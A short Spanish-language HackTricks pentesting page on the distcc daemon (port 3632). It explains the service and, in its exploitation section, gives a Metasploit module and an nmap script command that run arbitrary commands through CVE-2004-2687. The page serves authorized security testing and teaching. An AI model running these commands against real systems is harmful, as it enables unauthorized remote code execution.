hacktricks/network-services-pentesting/3632-pentesting-distcc.md
carlospolop 63bd9641c0 f
2023-06-05 20:33:24 +02:00

2.6 KiB

Información Básica

Distcc está diseñado para acelerar la compilación aprovechando la potencia de procesamiento no utilizada en otros ordenadores. Una máquina con distcc instalado puede enviar código para ser compilado a través de la red a un ordenador que tenga el demonio distccd y un compilador compatible instalado.

Puerto predeterminado: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Explotación

Comprueba si es vulnerable a CVE-2004-2687 para ejecutar código arbitrario:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

No creo que Shodan detecte este servicio.

Recursos

Post creado por Álex B (@r1p)

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥